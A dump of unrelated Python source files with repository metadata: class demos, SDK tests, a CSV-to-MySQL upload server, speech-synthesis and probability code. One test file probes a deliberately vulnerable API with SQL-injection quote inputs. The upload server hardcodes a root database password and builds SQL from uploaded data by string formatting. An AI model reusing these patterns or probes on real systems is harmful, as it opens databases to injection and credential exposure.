self.graphite = graphite
def draw(self):
print("The pencil is drawing")
def __erase(self):#Private
if self.__eraser:
print("The pencill is erasing")
else:
print("It's not possible to erase")
def getErase(self):
return self.__erase()
#Properties
@property #Getter
def eraser(self):
return self.__eraser
@eraser.setter
def eraser(self, newValue):
self.__eraser = newValue
@staticmethod
def thickness():
return '0.65 cm'
pen = Pencil("Verde", True, True)
#pen.draw()
#pen.getErase()
print(Pencil._length)
Pencil(1)
#Info class
#print('\n', pen.__dict__)
print()
print(pen.eraser)
pen.eraser = False
print(pen.eraser)
print("Class:", Pencil.thickness())
print("Instance:", pen.thickness())
| 22.981818
| 84
| 0.599684
|
a420022537a27f46857d881d54db04635f25562e
| 2,725
|
py
|
Python
|
sdk/python-sdk/test/protocols/test_QuestionAnswer.py
|
tw-bc-group/verity-sdk
|
e932209ab849f04a389bdda0718cd6227187e5cf
|
[
"Apache-2.0"
] | null | null | null |
sdk/python-sdk/test/protocols/test_QuestionAnswer.py
|
tw-bc-group/verity-sdk
|
e932209ab849f04a389bdda0718cd6227187e5cf
|
[
"Apache-2.0"
] | 2
|
2021-09-02T19:02:06.000Z
|
2021-09-02T19:02:24.000Z
|
sdk/python-sdk/test/protocols/test_QuestionAnswer.py
|
tw-bc-group/verity-sdk
|
e932209ab849f04a389bdda0718cd6227187e5cf
|
[
"Apache-2.0"
] | 1
|
2021-01-13T10:43:14.000Z
|
2021-01-13T10:43:14.000Z
|
# import pytest
#
# from test.test_utils import get_test_config, cleanup
# from verity_sdk.protocols.v1_0.QuestionAnswer import QuestionAnswer
# from verity_sdk.utils import COMMUNITY_MSG_QUALIFIER
# from verity_sdk.utils.Context import Context
#
# for_relationship = 'some_did'
# question_text = 'Are you trying to login to acme.com?'
# question_detail = 'IP Address: 56.24.11.126'
# valid_responses = ['Yes', 'No, that\'s not me!']
# signature_required = True
#
#
# def test_init():
# question_answer = QuestionAnswer(for_relationship, None, question_text, question_detail, valid_responses,
# signature_required)
#
# assert question_answer.for_relationship == for_relationship
# assert question_answer.question == question_text
# assert question_answer.descr == question_detail
# assert question_answer.valid_responses == valid_responses
# assert question_answer.signature_required == signature_required
#
#
# @pytest.mark.asyncio
# async def test_ask():
# context = await Context.create_with_config(await get_test_config())
# question_answer = QuestionAnswer(for_relationship, None, question_text, question_detail, valid_responses,
# signature_required)
# msg = question_answer.ask_msg(context)
#
# assert msg['@type'] == '{};spec/{}/{}/{}'.format(
# COMMUNITY_MSG_QUALIFIER,
# QuestionAnswer.MSG_FAMILY,
# QuestionAnswer.MSG_FAMILY_VERSION,
# QuestionAnswer.ASK_QUESTION
# )
# assert msg['@id'] is not None
# assert msg['~thread'] is not None
# assert msg['~thread']['thid'] is not None
# assert msg['~for_relationship'] == for_relationship
# assert msg['text'] == question_text
# assert msg['detail'] == question_detail
# assert msg['valid_responses'] == valid_responses
# assert msg['signature_required'] == signature_required
#
# await cleanup(context)
#
#
# @pytest.mark.asyncio
# async def test_status():
# context = await Context.create_with_config(await get_test_config())
# question_answer = QuestionAnswer(for_relationship, None, question_text, question_detail, valid_responses,
# signature_required)
# msg = question_answer.status_msg(context)
#
# assert msg['@type'] == '{};spec/{}/{}/{}'.format(
# COMMUNITY_MSG_QUALIFIER,
# QuestionAnswer.MSG_FAMILY,
# QuestionAnswer.MSG_FAMILY_VERSION,
# QuestionAnswer.GET_STATUS
# )
# assert msg['@id'] is not None
# assert msg['~for_relationship'] == for_relationship
# assert msg['~thread'] is not None
# assert msg['~thread']['thid'] is not None
#
# await cleanup(context)
| 38.928571
| 111
| 0.678899
|
b1f0af366f8009d3e1f2e0737b18ea2205c89383
| 9,243
|
py
|
Python
|
src/csv_db_package/fileserver.py
|
ankitaliya/csv_db_package
|
4c61a26132c7ce1de4440c1fc0ca6cf1ee39c0a3
|
[
"MIT"
] | null | null | null |
src/csv_db_package/fileserver.py
|
ankitaliya/csv_db_package
|
4c61a26132c7ce1de4440c1fc0ca6cf1ee39c0a3
|
[
"MIT"
] | null | null | null |
src/csv_db_package/fileserver.py
|
ankitaliya/csv_db_package
|
4c61a26132c7ce1de4440c1fc0ca6cf1ee39c0a3
|
[
"MIT"
] | null | null | null |
"""The script to create a http server on local for uploading a csv file
and perform CRUD operations on the UI connected with the database."""
from http.server import HTTPServer, BaseHTTPRequestHandler
import cgi
import logging
import jinja2
from mysql.connector import connect, errors
import pandas as pd
from crud_operations import view_data, delete_row, insert_row, select_row, update_row
logging.basicConfig(filename='server_statements.log', level=logging.DEBUG,
format='%(asctime)s:%(levelname)s:%(message)s')
CREATE_TABLE_QUERY = """
CREATE TABLE user_file_data(p_id int PRIMARY KEY, first_name varchar(255),height_feet float,
height_inches float, last_name varchar(255),position varchar(255),weight_pounds float,id int,
abbreviation varchar(255),city varchar(255), conference varchar(255), division varchar(255),
full_name varchar(255), name varchar(255))
"""
def csv_to_db(file_name):
"""The function reads a file that was uploaded by the user to the server.
It creates connection to the database and that file was dumped to the database.
: param - csv file uploaded by the user."""
data_frame = pd.read_csv(file_name, index_col=False, delimiter=',')
replacement = {'height_feet': 0.0, 'height_inches': 0.0,
'position': "missing", 'weight_pounds': 0.0}
data_frame.fillna(value=replacement, inplace=True)
data_frame.fillna(0, inplace=True)
try:
conn = connect(host='localhost',
database="user_data",
user='root',
password='Arp@99?0#1Liy@')
if conn.is_connected():
cursor = conn.cursor()
cursor.execute("select database();")
record = cursor.fetchone()
logging.info("You're connected to database: %s", record)
cursor.execute('DROP TABLE IF EXISTS user_file_data;')
logging.info('Creating table....')
cursor.execute(CREATE_TABLE_QUERY)
logging.info("Table is created....")
# loop through the data frame
for i, row in data_frame.iterrows():
cursor.execute(f"INSERT INTO user_data.user_file_data VALUES {tuple(row)}")
conn.commit()
except errors.ProgrammingError as prmg_err:
logging.error('%s: %s', prmg_err.__class__.__name__, prmg_err)
except errors.Error as err_e:
logging.error('%s: %s', err_e.__class__.__name__, err_e)
class EchoHandler(BaseHTTPRequestHandler):
"""class containing different GET and POST methods for the http server that was used
to upload a csv file from the user. Then the CRUD operations is performed on the UI
as per the user wants to do with a connection to a database."""
def do_GET(self):
"""Function to upload file and perform CRUD operations on client side."""
try:
if self.path.endswith('/uploadCSV'):
self.send_response(200)
self.send_header('content-type', 'text/html')
self.end_headers()
with open('Templates/index.html', 'r', encoding='utf-8') as index_file:
output = index_file.read()
self.wfile.write(output.encode())
if self.path.endswith('/new'):
self.send_response(200)
self.send_header('content-type', 'text/html')
self.end_headers()
with open('Templates/upload_file.html', 'r', encoding='utf-8') as uploaded_file:
output = uploaded_file.read()
self.wfile.write(output.encode())
if self.path.endswith('/viewtable'):
self.send_response(200)
self.send_header('content-type', 'text/html')
self.end_headers()
table = view_data('user_data', 'user_file_data')[0]
if table is not None:
with open('Templates/view_table.html', 'r', encoding='utf-8') as view_file:
output = view_file.read()
render_output = jinja2.Template(output)
self.wfile.write(render_output.render(table=table).encode())
if self.path.endswith('/add'):
self.send_response(200)
self.send_header('content-type', 'text/html')
self.end_headers()
with open('Templates/add_data.html', 'r', encoding='utf-8') as add_file:
output = add_file.read()
self.wfile.write(output.encode())
if self.path.startswith('/update_data'):
value = self.path[21:]
self.send_response(200)
self.send_header('content-type', 'text/html')
self.end_headers()
row_form = select_row('user_data', 'user_file_data', int(value))
if row_form is not None:
with open('Templates/update_data.html', 'r', encoding='utf-8') as update_file:
output = update_file.read()
render_output = jinja2.Template(output)
self.wfile.write(render_output.render(row_form=row_form).encode())
except PermissionError as per_err:
logging.error('%s: %s', per_err.__class__.__name__, per_err)
except TypeError as type_err:
logging.error('%s: %s', type_err.__class__.__name__, type_err)
def do_POST(self):
"""Function to upload data to db and returns table and perform CRUD operations."""
try:
if self.path.endswith('/new'):
ctype, pdict = cgi.parse_header(self.headers.get('content-type'))
pdict['boundary'] = bytes(pdict['boundary'], "utf-8")
content_len = int(self.headers.get('Content-length'))
pdict['CONTENT_LENGTH'] = content_len
if ctype == 'multipart/form-data':
fields = cgi.parse_multipart(self.rfile, pdict)
file = fields.get('task')[0]
file = file.decode("utf-8")
with open('uploaded_file/file.csv', mode='w', encoding='utf-8') as csv_file:
for data in file.split('\r\r'):
csv_file.write(data)
csv_to_db('file.csv')
self.send_response(301)
self.send_header('content-type', 'text/html')
self.send_header('Location', '/viewtable')
self.end_headers()
self.wfile.write(file.encode())
if self.path.startswith('/delete_data'):
value_id = self.path[22:]
delete_row('user_data', 'user_file_data', value_id)
self.send_response(301)
self.send_header('content-type', 'text/html')
self.send_header('Location', '/viewtable')
self.end_headers()
if self.path.endswith('/add'):
ctype, pdict = cgi.parse_header(self.headers.get('content-type'))
pdict['boundary'] = bytes(pdict['boundary'], "utf-8")
content_len = int(self.headers.get('Content-length'))
pdict['CONTENT_LENGTH'] = content_len
if ctype == 'multipart/form-data':
fields = cgi.parse_multipart(self.rfile, pdict)
for key in fields:
fields[key] = fields[key][0]
insert_row('user_data', 'user_file_data', fields)
self.send_response(301)
self.send_header('content-type', 'text/html')
self.send_header('Location', '/viewtable')
self.end_headers()
if self.path.startswith('/update_data'):
ctype, pdict = cgi.parse_header(self.headers.get('content-type'))
pdict['boundary'] = bytes(pdict['boundary'], "utf-8")
content_len = int(self.headers.get('Content-length'))
pdict['CONTENT_LENGTH'] = content_len
if ctype == 'multipart/form-data':
fields = cgi.parse_multipart(self.rfile, pdict)
for key in fields:
fields[key] = fields[key][0]
update_row('user_data', 'user_file_data', fields, int(fields['p_id']))
self.send_response(301)
self.send_header('content-type', 'text/html')
self.send_header('Location', '/viewtable')
self.end_headers()
except PermissionError as per_err:
logging.error('%s: %s', per_err.__class__.__name__, per_err)
except TypeError as type_err:
logging.error('%s: %s', type_err.__class__.__name__, type_err)
def main():
"""The main function creates a server on defined port with the help of http.server package."""
port = 8000
server = HTTPServer(('', port), EchoHandler)
logging.info('Server running on port %s', port)
server.serve_forever()
if __name__ == '__main__':
main()
| 46.918782
| 117
| 0.572217
|
fbc610cd1e1d060960e96bb00f0f0548d59d7685
| 1,147
|
py
|
Python
|
chapter7_语音合成/C7_2_y.py
|
busyyang/python_sound_open
|
91bc284f0ed538c1e8756a1a1475956191b4ae86
|
[
"Apache-2.0"
] | 165
|
2020-06-10T03:39:17.000Z
|
2022-03-28T08:37:32.000Z
|
chapter7_语音合成/C7_2_y.py
|
shangminghao/python_sound_open
|
91bc284f0ed538c1e8756a1a1475956191b4ae86
|
[
"Apache-2.0"
] | 3
|
2020-11-20T03:00:56.000Z
|
2021-08-05T01:30:32.000Z
|
chapter7_语音合成/C7_2_y.py
|
shangminghao/python_sound_open
|
91bc284f0ed538c1e8756a1a1475956191b4ae86
|
[
"Apache-2.0"
] | 66
|
2020-06-02T01:57:24.000Z
|
2022-03-16T07:54:59.000Z
|
from chapter2_基础.soundBase import *
from chapter7_语音合成.flipframe import *
from chapter3_分析实验.C3_1_y_1 import enframe
from chapter3_分析实验.lpc import lpc_coeff
from scipy.signal import lfilter
plt.rcParams['font.sans-serif'] = ['SimHei']
plt.rcParams['axes.unicode_minus'] = False
data, fs = soundBase('C7_2_y.wav').audioread()
data -= np.mean(data)
data /= np.max(np.abs(data))
N = len(data)
time = [i / fs for i in range(N)] # 设置时间
p = 12
wlen, inc = 200, 80
msoverlap = wlen - inc
y = enframe(data, wlen, inc)
fn = y.shape[0]
Acoef = np.zeros((y.shape[0], p + 1))
resid = np.zeros(y.shape)
synFrame = np.zeros(y.shape)
## 7.2.1
# 求每帧的LPC系数与预测误差
for i in range(fn):
a, _ = lpc_coeff(y[i, :], p)
Acoef[i, :] = a
resid[i, :] = lfilter(a, [1], y[i, :])
# 语音合成
for i in range(fn):
synFrame[i, :] = lfilter([1], Acoef[i, :], resid[i, :])
outspeech = Filpframe_OverlapS(synFrame, np.hamming(wlen), inc)
plt.subplot(2, 1, 1)
plt.plot(data / np.max(np.abs(data)), 'k')
plt.title('原始信号')
plt.subplot(2, 1, 2)
plt.title('还原信号-LPC与误差')
plt.plot(outspeech / np.max(np.abs(outspeech)), 'c')
plt.savefig('images/LPC与误差.png')
plt.close()
| 24.404255
| 63
| 0.659983
|
9a210bf79367694f4925238b3a020b2a0ceaefaa
| 5,031
|
py
|
Python
|
distrax/_src/distributions/uniform.py
|
LaudateCorpus1/distrax
|
ed8381045a0eb08eea262ac8707f9d77692475ef
|
[
"Apache-2.0"
] | null | null | null |
distrax/_src/distributions/uniform.py
|
LaudateCorpus1/distrax
|
ed8381045a0eb08eea262ac8707f9d77692475ef
|
[
"Apache-2.0"
] | 1
|
2021-10-05T16:07:30.000Z
|
2021-10-05T16:07:30.000Z
|
distrax/_src/distributions/uniform.py
|
LaudateCorpus1/distrax
|
ed8381045a0eb08eea262ac8707f9d77692475ef
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 DeepMind Technologies Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Uniform distribution."""
import math
from typing import Tuple, Union
import chex
from distrax._src.distributions import distribution
from distrax._src.utils import conversion
import jax
import jax.numpy as jnp
from tensorflow_probability.substrates import jax as tfp
tfd = tfp.distributions
Array = chex.Array
Numeric = chex.Numeric
PRNGKey = chex.PRNGKey
class Uniform(distribution.Distribution):
"""Uniform distribution with `low` and `high` parameters."""
equiv_tfp_cls = tfd.Uniform
def __init__(self, low: Numeric = 0., high: Numeric = 1.):
"""Initializes a Uniform distribution.
Args:
low: Lower bound.
high: Upper bound.
"""
super().__init__()
self._low = conversion.as_float_array(low)
self._high = conversion.as_float_array(high)
self._batch_shape = jax.lax.broadcast_shapes(
self._low.shape, self._high.shape)
@property
def event_shape(self) -> Tuple[int, ...]:
"""Shape of the events."""
return ()
@property
def low(self) -> Array:
"""Lower bound."""
return jnp.broadcast_to(self._low, self.batch_shape)
@property
def high(self) -> Array:
"""Upper bound."""
return jnp.broadcast_to(self._high, self.batch_shape)
@property
def range(self) -> Array:
return self.high - self.low
@property
def batch_shape(self) -> Tuple[int, ...]:
return self._batch_shape
def _sample_n(self, key: PRNGKey, n: int) -> Array:
"""See `Distribution._sample_n`."""
new_shape = (n,) + self.batch_shape
uniform = jax.random.uniform(
key=key, shape=new_shape, dtype=self.range.dtype, minval=0., maxval=1.)
low = jnp.expand_dims(self._low, range(uniform.ndim - self._low.ndim))
range_ = jnp.expand_dims(self.range, range(uniform.ndim - self.range.ndim))
return low + range_ * uniform
def _sample_n_and_log_prob(self, key: PRNGKey, n: int) -> Tuple[Array, Array]:
"""See `Distribution._sample_n_and_log_prob`."""
samples = self._sample_n(key, n)
log_prob = -jnp.log(self.range)
log_prob = jnp.repeat(log_prob[None], n, axis=0)
return samples, log_prob
def log_prob(self, value: Array) -> Array:
"""See `Distribution.log_prob`."""
return jnp.log(self.prob(value))
def prob(self, value: Array) -> Array:
"""See `Distribution.prob`."""
return jnp.where(
jnp.logical_or(value < self.low, value > self.high),
jnp.zeros_like(value),
jnp.ones_like(value) / self.range)
def entropy(self) -> Array:
"""Calculates the entropy."""
return jnp.log(self.range)
def mean(self) -> Array:
"""Calculates the mean."""
return (self.low + self.high) / 2.
def variance(self) -> Array:
"""Calculates the variance."""
return jnp.square(self.range) / 12.
def stddev(self) -> Array:
"""Calculates the standard deviation."""
return self.range / math.sqrt(12.)
def median(self) -> Array:
"""Calculates the median."""
return self.mean()
def cdf(self, value: Array) -> Array:
"""See `Distribution.cdf`."""
ones = jnp.ones_like(self.range)
zeros = jnp.zeros_like(ones)
result_if_not_big = jnp.where(
value < self.low, zeros, (value - self.low) / self.range)
return jnp.where(value > self.high, ones, result_if_not_big)
def log_cdf(self, value: Array) -> Array:
"""See `Distribution.log_cdf`."""
return jnp.log(self.cdf(value))
def _kl_divergence_uniform_uniform(
dist1: Union[Uniform, tfd.Uniform],
dist2: Union[Uniform, tfd.Uniform],
*unused_args, **unused_kwargs,
) -> Array:
"""Obtain the KL divergence `KL(dist1 || dist2)` between two Uniforms.
Note that the KL divergence is infinite if the support of `dist1` is not a
subset of the support of `dist2`.
Args:
dist1: A Uniform distribution.
dist2: A Uniform distribution.
Returns:
Batchwise `KL(dist1 || dist2)`.
"""
return jnp.where(
jnp.logical_and(dist2.low <= dist1.low, dist1.high <= dist2.high),
jnp.log(dist2.high - dist2.low) - jnp.log(dist1.high - dist1.low),
jnp.inf)
# Register the KL functions with TFP.
tfd.RegisterKL(Uniform, Uniform)(_kl_divergence_uniform_uniform)
tfd.RegisterKL(Uniform, Uniform.equiv_tfp_cls)(_kl_divergence_uniform_uniform)
tfd.RegisterKL(Uniform.equiv_tfp_cls, Uniform)(_kl_divergence_uniform_uniform)
| 31.055556
| 80
| 0.675214
|
e7520e386dac674ee0c67f2f0de718e673e457de
| 3,626
|
py
|
Python
|
sic_codes.py
|
leanguardia/gender-pay-gap-uk
|
85633151380bb641fc08112fed199334013b7b3c
|
[
"MIT"
] | 1
|
2021-01-13T13:40:16.000Z
|
2021-01-13T13:40:16.000Z
|
sic_codes.py
|
leanguardia/gender-pay-gap-uk
|
85633151380bb641fc08112fed199334013b7b3c
|
[
"MIT"
] | null | null | null |
sic_codes.py
|
leanguardia/gender-pay-gap-uk
|
85633151380bb641fc08112fed199334013b7b3c
|
[
"MIT"
] | null | null | null |
import pandas as pd
import numpy as np
def drop_sic_codes_na(df):
""" Removes all rows with missing SicCodes
"""
return df.dropna(subset=['SicCodes']).reset_index(drop=True)
def clean_sic_codes(df):
""" Cleans lists of SicCodes
"""
df = _codes_to(df, str)
df.SicCodes = df.SicCodes.apply(_strip_and_split)
return df
def add_sections(df):
""" Maps five digit SicCodes to single character Sections and stores them in SicSections
"""
codes_to_section = _build_code_to_section_dict()
sic_sections = df.SicCodes.apply(_map_codes_to_section, args=(codes_to_section,))
df['SicSections'] = sic_sections
return df
def explode_sections(df):
""" Creates a row for each of the industry sections a company belongs.
Additionaly, the section description is added in a new column
"""
df = df.explode('SicSections')
section_to_desc = _build_section_to_desc_dict()
df['SectDesc'] = df.SicSections.map(section_to_desc)
return df
def split_sectors(df):
""" Splits elements in Sic Codes list and distributes them in 21 dummy columns
representing whether that company belongs to an Industrial Section or not.
Requirements: df should have already gone through `drop_sic_codes` and
`clean_sic_codes`.
"""
df = df.copy()
df = drop_sic_codes_na(df)
sections = _get_sections()
dummies = _generate_dummies(df, sections)
df = df.join(dummies)
return df
def _get_sections():
return pd.unique(_load_codes().Section)
def _get_section_descriptions():
return pd.Series(_load_codes().SectionDesc.unique()).apply(_first_sentence)
def _codes_to(df, typ):
df.SicCodes = df.SicCodes.astype(typ)
return df
def _map_codes_to_section(codes, codes_to_section):
return np.unique(
[codes_to_section[int(code)] for code in codes if int(code) in codes_to_section]
)
def _generate_dummies(df, sections):
dummies = _build_empty_dummies(df, sections)
code_to_section = _build_code_to_section_dict()
for i, sic_codes in enumerate(df.SicCodes):
sections = [code_to_section[int(code)] for code in sic_codes if int(code) in code_to_section]
indices = np.unique(dummies.columns.get_indexer(sections))
dummies.iloc[i, indices] = 1
return dummies.add_prefix('Sect')
def _build_empty_dummies(df, sections):
zeroes = np.zeros((df.shape[0], len(sections)), dtype=int)
return pd.DataFrame(zeroes, columns=sections, index=df.index)
def _build_code_to_section_dict():
codes = _load_codes()
code_to_section = {}
for i, sic_code in enumerate(codes.SicCodes):
row = codes.iloc[i]
code_to_section[row.SicCodes] = row.Section
# code_to_section[1] = "Unknown" # Uncomment to encode invalid value (1)
return code_to_section
def _build_section_to_desc_dict():
return dict(zip(_get_sections(), _get_section_descriptions()))
def _strip_and_split(codes):
return codes.replace('\r\n','').split(',')
def _first_sentence(description):
return description.split(';')[0]
def _load_codes():
codes = pd.read_csv('data/sic_codes.csv')
codes.rename(columns={
"sic_code": "SicCodes",
"section": "Section",
"section_description": "SectionDesc"
}, inplace=True)
codes.drop(['sic_version'], axis='columns', inplace=True)
codes = _codes_to(codes, int)
return codes
def main():
df = pd.read_csv('data/UK-Gender-Pay-Gap-Data-2018-2019.csv')
df = drop_sic_codes_na(df)
df = clean_sic_codes(df)
return df
if __name__ == "__main__":
df = main()
| 32.666667
| 101
| 0.694981
|
3a956c607a1ae3293da5944bb5ea9b3b4822c64f
| 114
|
py
|
Python
|
Software/main.py
|
cboltz/MacherdaachBadgeQueue
|
ed8b39a0fb1c3fe43e61179c0c510cc011dd9a48
|
[
"CC0-1.0"
] | null | null | null |
Software/main.py
|
cboltz/MacherdaachBadgeQueue
|
ed8b39a0fb1c3fe43e61179c0c510cc011dd9a48
|
[
"CC0-1.0"
] | null | null | null |
Software/main.py
|
cboltz/MacherdaachBadgeQueue
|
ed8b39a0fb1c3fe43e61179c0c510cc011dd9a48
|
[
"CC0-1.0"
] | null | null | null |
from controller.controller import Controller
def run():
Controller()
if __name__ == '__main__':
run()
| 11.4
| 44
| 0.675439
|
9122864a19a16d1576b1dad9a56a3810032a7845
| 2,763
|
py
|
Python
|
test-import-vulnerable-api-master/test-import-vulnerable-api-master/test/test_vapi.py
|
rmit-cyber-ready-cic/Security99
|
2d32865aef91f09b0edac2dd926ce603769052d7
|
[
"MIT"
] | null | null | null |
test-import-vulnerable-api-master/test-import-vulnerable-api-master/test/test_vapi.py
|
rmit-cyber-ready-cic/Security99
|
2d32865aef91f09b0edac2dd926ce603769052d7
|
[
"MIT"
] | null | null | null |
test-import-vulnerable-api-master/test-import-vulnerable-api-master/test/test_vapi.py
|
rmit-cyber-ready-cic/Security99
|
2d32865aef91f09b0edac2dd926ce603769052d7
|
[
"MIT"
] | null | null | null |
import json
import unittest
from test import BaseTestCase
class TestvAPI(BaseTestCase):
def test_tokens_1(self):
headers = { "Content-type": "application/json"}
r = self.client.open(
"/tokens",
method='POST',
data=json.dumps({'username': "blah1'", 'password': 'blah'}),
headers=headers)
print(r.status_code, r.data)
self.assertEqual(r.status_code,500)
def test_tokens_2(self):
headers = { "Content-type": "application/json"}
r = self.client.open(
"/tokens",
method='POST',
data=json.dumps({"username": "blah1'", "password": "blah"}),
headers=headers)
print(r.status_code, r.data)
self.assertEqual(r.status_code,500)
def test_tokens_3(self):
headers = { "Content-type": "application/json"}
r = self.client.open(
"/tokens",
method='POST',
data=json.dumps({"username": "blah1'", "password": "blah"}),
headers=headers)
print(r.status_code, r.data)
self.assertEqual(r.status_code,500)
def test_tokens_4(self):
headers = { "Content-type": "application/json"}
r = self.client.post(
"/tokens",
data=json.dumps({'username': 'blah1\'', "password": "blah"}),
headers=headers)
print(r.status_code, r.data)
self.assertEqual(r.status_code,500)
def test_widget_1(self):
headers = { "Content-type": "application/json", "X-Auth-Token": "4d94fc705cd9b2b36b2280dd543d9004"}
r = self.client.post(
"/widget",
data=json.dumps({'name': 'blah1'}),
headers=headers)
# print(r.status_code, r.data)
self.assertEqual(r.status_code,200)
def test_widget_2(self):
headers = { "Content-type": "application/json", "X-Auth-Token": "4d94fc705cd9b2b36b2280dd543d9004"}
r = self.client.post(
"/widget",
data=json.dumps({'name': 'blah'}),
headers=headers)
self.assertEqual(r.status_code,403)
def test_widget_3(self):
headers = { "Content-type": "application/json", "X-Auth-Token": "tokenwithsinglequote'"}
r = self.client.post(
"/widget",
data=json.dumps({'name': 'blah1'}),
headers=headers)
self.assertEqual(r.status_code,500)
def test_widget_4(self):
headers = { "Content-type": "application/json", "X-Auth-Token": "unknowntoken"}
r = self.client.post(
"/widget",
data=json.dumps({'name': 'blah1'}),
headers=headers)
self.assertEqual(r.status_code,401)
if __name__ == '__main__':
unittest.main()
| 33.695122
| 107
| 0.566051
|
e380debf42eb8210370254ea98e490baf7f5c9c3
| 4,550
|
py
|
Python
|
mtgreatest-py/mtgreatest/scrape/players.py
|
oelarnes/mtgreatest
|
e2bf74fe9695302d6881e835e2cd1f5d2b312b5c
|
[
"MIT"
] | null | null | null |
mtgreatest-py/mtgreatest/scrape/players.py
|
oelarnes/mtgreatest
|
e2bf74fe9695302d6881e835e2cd1f5d2b312b5c
|
[
"MIT"
] | null | null | null |
mtgreatest-py/mtgreatest/scrape/players.py
|
oelarnes/mtgreatest
|
e2bf74fe9695302d6881e835e2cd1f5d2b312b5c
|
[
"MIT"
] | null | null | null |
import requests
import re
from bs4 import BeautifulSoup
from distance import levenshtein
from mtgreatest.rdb import Cursor, serialize
NUM_NORM_NAMES = 4
NORM_NAMES = ['norm_name_{}'.format(num) for num in range(NUM_NORM_NAMES)]
def fix_name_and_country(name, country):
if name is None:
return (name, country)
part = name.rpartition('[')
if len(part[0]):
return (part[0][:-1], part[1]+part[2])
else:
return (name, country)
def normalize_raw_name(raw_name):
raw_name = raw_name.upper()
sleep_in_patterns = ['ZVIP', 'ZZVIP', 'ZZZVIP', 'ZZ', 'ZZZ', 'ZZSIS', 'ZZFIX', 'ZZZ_', 'ZZZZZ', 'VIP', 'VIP_', 'AAVIP', 'AAA VIP -']
for pattern in sleep_in_patterns:
if raw_name.startswith(pattern) and not raw_name.startswith('VIPPERMAN'):
raw_name = raw_name.rpartition(pattern)[2]
elif raw_name.endswith(pattern):
raw_name = raw_name.partition(pattern)[0]
raw_name = raw_name.strip(' ()1234567890')
last_first = list(raw_name.partition(','))
last_first[0] = last_first[0].partition('[')[0].rstrip(' *').strip(' *')
last_first[2] = last_first[2].rpartition('SEE SK ')[2].strip(' *').rstrip(' *') #why?? what is this??
normalized_name = last_first[0]
if len(last_first[2]):
normalized_name += ', ' + last_first[2]
return normalized_name
def normalize_full_raw_name(full_raw_name):
return '/'.join([normalize_raw_name(name) for name in full_raw_name.split('/')])
def max_name_list(names1, names2):
ret_names = []
for name in names1:
if not any([name2.startswith(name) for name2 in names2]):
ret_names.append(name)
for name in names2:
if not any([name1.startswith(name) and len(name1)>len(name) for name1 in names1]):
ret_names.append(name)
return ret_names
def normalized_event_names(event_id):
cursor = Cursor()
num_rounds = cursor.execute("select max(round_num) from results_raw_table where event_id = '{}'".format(event_id))[0][0]
all_round_names = []
for round_num in range(num_rounds):
names = cursor.execute("select distinct p1_name_raw from results_raw_table where event_id = '{}' and round_num = {}".format(event_id, round_num))
names += cursor.execute("select distinct p2_name_raw from results_raw_table where event_id = '{}' and round_num = {}".format(event_id, round_num))
all_round_names.append(list(set([normalize_raw_name(item) for sublist in names for item in sublist if '* BYE *' not in item and 'Awarded Bye' not in item])))
cursor.close()
return reduce(max_name_list, all_round_names, [])
def populate_event_player_table(event_names, event_id):
cursor = Cursor()
cursor.execute("delete from event_player_table where event_id = {}".format(serialize(event_id)))
query = "select player_id, "
query += ', '.join(NORM_NAMES)
query += ' from player_table where '
or_ = False
for name in event_names:
if or_:
query += "or "
or_ = True
join_str = ' like {}'.format(serialize(name + '%'))
query += (join_str + ' or ').join(NORM_NAMES) + join_str
player_table_names = cursor.execute(query)
found_names = []
new_names = []
for name in event_names:
found = False
for idx, row in enumerate(player_table_names):
if name in row:
if found:
raise 'two matches found for name ' + name
found_names.append({'player_id':row[0], 'normalized_name':name, 'event_id':event_id})
found = True
if not found:
new_names.append(name)
player_id = cursor.execute("select max(player_id) from player_table")[0][0] or 1
new_players = []
for name in new_names:
player_id += 1
new_players.append({'player_id':player_id, 'norm_name_1':name, 'event_added':event_id, 'last_name':name.partition(',')[0],
'first_name':name.partition(', ')[2]})
found_names.append({'player_id':player_id, 'normalized_name':name, 'event_id':event_id})
cursor.insert('event_player_table', found_names)
cursor.insert('player_table', new_players)
cursor.close()
def remove_header_row():
query = "delete from results_raw_table where table_id like '%table%'"
cursor = Cursor()
cursor.execute(query);
cursor.close();
def combine_players(norm_name_1, norm_name_2):
query_template = "select * from player_table where "
query_template += ' or '.join([name + ' like {0}' for name in NORM_NAMES])
cursor = Cursor()
player_infos = [cursor.execute(query_template.format(serialize(name))) for name in (norm_name_1, norm_name_2)]
assert len(player_infos[0]) == 1 and len(player_infos[1]) == 1, "multiple or no matches found for a name"
| 39.224138
| 161
| 0.695824
|
ec3e3b9ff7e653c612e2deb9d9d4329753b86051
| 782
|
py
|
Python
|
tests/test_utils.py
|
coderatchet/scrapy-test
|
4f5febfca05d267dc98df94e65a403210ce39d81
|
[
"Apache-2.0"
] | null | null | null |
tests/test_utils.py
|
coderatchet/scrapy-test
|
4f5febfca05d267dc98df94e65a403210ce39d81
|
[
"Apache-2.0"
] | null | null | null |
tests/test_utils.py
|
coderatchet/scrapy-test
|
4f5febfca05d267dc98df94e65a403210ce39d81
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
test_utils.py
Copyright 2017 CodeRatchet
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
"""
from scrapytest.utils import find_first, merge_dict
def test_find_first_returns_none_on_condition_not_found():
assert find_first({'foo': 'bar', 'baz': 'spam'}, lambda x, y: False) is None
def test_merge_dict_sees_correct_values():
a = {'first': {'all_rows': {'pass': 'dog', 'number': '1'}}}
b = {'first': {'all_rows': {'fail': 'cat', 'number': '5'}}}
assert merge_dict(b, a) == {'first': {'all_rows': {'pass': 'dog', 'fail': 'cat', 'number': '5'}}}
| 31.28
| 101
| 0.643223
|
a69ee7a9f888d8536f4bf36dc0bbbceb6bad0d24
| 1,333
|
py
|
Python
|
iotbx/command_line/pdb.box_around_molecule.py
|
rimmartin/cctbx_project
|
644090f9432d9afc22cfb542fc3ab78ca8e15e5d
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
iotbx/command_line/pdb.box_around_molecule.py
|
rimmartin/cctbx_project
|
